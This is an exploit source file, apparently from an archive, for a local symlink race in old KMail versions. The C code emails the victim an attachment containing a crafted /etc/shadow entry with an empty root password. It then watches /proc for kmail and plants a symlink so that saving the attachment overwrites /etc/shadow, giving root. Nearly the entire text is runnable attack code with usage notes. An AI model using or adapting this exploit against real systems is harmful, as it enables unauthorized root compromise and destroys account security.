KDE, kmail local email-attachment symlink exploit - possible root comprimise. Kmail older than v1.1.1 is vulnerable.
4afa410db651af6de289d5b36edc2bec4444366a290b9429cec19406217a4680
/* *- PRIVATE FOR NOW!! -*
KDE, kmail local email-attachment symlink exploit - possible root comprimise.
Discovered/coded by: DiGiT - teddi@linux.is
This sploit simply sends an email to somedude@somehost with an attachment on it
that contains a fixed 'shadow' file that set's no password for root, change
that if you need to.
It then scans /proc for a kmail process and when a kmail process starts it
will create /tmp/kmail"`pidof kmail`" and therein the dir part2 and a symlink
to /etc/shadow.
Then when root or whatever checks his mail the attachment, get's written over
/etc/shadow, setting it so that root has no password so u can su - to get root
privs.
Run this sploit with nohup or screen or smt.
Greets, #hax (ircnet!)
special greets, p0rtal(transmit, etc), icemav, cookie, crazy-b.
- DiGiT
*- PRIVATE FOR NOW!! -* */
#include <stdio.h>
#include <dirent.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdarg.h>
#define DELAY 1 // secs, watch it here..
void scan_processes();
void find_processes();
char username[20];
char hostname[256];
char sockbuff[2048];
static int sockfd;
struct sockaddr_in in_addr;
void transmit(char *format, ...)
{
va_list va;
va_start (va, format);
vsnprintf (sockbuff, sizeof(sockbuff), format, va);
va_end (va);
strcat (sockbuff, "\r\n");
if ( (write (sockfd, sockbuff, strlen(sockbuff))) < 0)
{
fprintf (stderr, "ERROR: Could not WRITE to socket %d!", sockfd);
exit(4);
}
memset (sockbuff, '\0', sizeof(sockbuff));
}
void create_dirs(char *directory) {
char filename[1024];
printf("creating dirs & symlink..\n");
snprintf (filename, sizeof(filename)-1, "/tmp/kmail%s", directory);
mkdir(filename, 0777);
chdir(filename);
mkdir("part2", 0777);
chdir("part2");
symlink("/etc/shadow", "shadow");
exit(0);
}
void send_mail() {
struct hostent *he;
if ((he=gethostbyname(hostname)) == NULL) {
herror("gethostbyname");
exit(1);
}
in_addr.sin_family = AF_INET;
in_addr.sin_port = htons(25);
in_addr.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(in_addr.sin_zero), 8);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket");
exit(0);
}
if(connect(sockfd, (struct sockaddr *)&in_addr, sizeof(in_addr)) < 0){
perror("connect");
exit(0);
}
transmit ("EHLO www.microsoft.com");
transmit ("MAIL FROM: wanker@www.microsoft.com");
transmit ("RCPT TO: %s@%s", username, hostname);
transmit ("DATA");
transmit ("From: <wanker@www.microsoft.com>");
transmit ("X-Sender: root@killer");
transmit ("To: %s@%s", username, hostname);
transmit ("Subject: test");
transmit ("Message-ID: <kmail.9905122356390.190-200000@killer>");
transmit ("MIME-Version: 1.0");
transmit ("Content-Type: MULTIPART/MIXED; BOUNDARY=\"0-821493994-926553406=:190\"");
transmit (""); //blah :>
transmit (" This message is in MIME format. The first part should be readable text,");
transmit (" while the remaining parts are likely unreadable without MIME-aware tools.");
transmit (" Send mail to mime@docserver.cac.washington.edu for more info.");
transmit ("");
transmit ("--0-821493994-926553406=:190");
transmit ("Content-Type: TEXT/PLAIN; charset=US-ASCII");
transmit ("\n"); //three
transmit ("--0-821493994-926553406=:190");
transmit ("Content-Type: TEXT/PLAIN; charset=US-ASCII; name=shadow");
transmit ("Content-Transfer-Encoding: BASE64");
transmit ("Content-ID: <kmail.9905122356460.190@killer>");
transmit ("Content-Description:");
transmit ("Content-Disposition: attachment; filename=shadow");
transmit ("");
transmit ("cm9vdDo6MTA2OTU6MDo6Ojo6");
transmit ("--0-821493994-926553406=:190--");
transmit (".");
transmit ("QUIT");
printf("sent the data.. find the process..\n");
find_processes();
}
void find_processes() {
struct dirent **namelist;
int n;
while(1) {
n = scandir("/proc", &namelist, 0, alphasort);
if (n < 0)
perror("scandir");
else
sleep(DELAY);
while(n--) scan_processes(namelist[n]->d_name);
}
}
void scan_processes(char *dir) {
struct stat fbuf;
char buffer[1024];
char buffer2[1024];
FILE *fd;
memset (buffer2, '\0', sizeof(buffer2));
snprintf (buffer2, sizeof(buffer2), "/proc/%s", dir);
if(chdir(buffer2) == -1)
return ;
if(stat("cmdline", &fbuf) == -1)
return ;
fd = fopen("cmdline", "r");
fgets(buffer, sizeof(buffer), fd);
if(!strncmp(buffer, "kmail", sizeof(buffer)) > 0) {
printf("Yay! Found Kmail process #%s\n", dir);
printf("Lets set up the proper symlinks etc.\n");
create_dirs(dir);
}
else
fclose(fd);
return;
}
int main(char argc, char *argv[]) {
if(argc < 2) {
fprintf(stderr, "\n[Kde Kmail email-attachment symlink race exploit, by DiGiT - teddi@linux.is]\n");
fprintf(stderr, "[Syntax is: %s user host : ie %s root theboxyouron.com]\n", argv[0], argv[0]);
fprintf(stderr, "[Make sure you hit the right email address]\n\n");
exit(0);
}
strncpy(username, argv[1], sizeof(username));
strncpy(hostname, argv[2], sizeof(hostname));
printf("starting the attack...\n");
send_mail();
}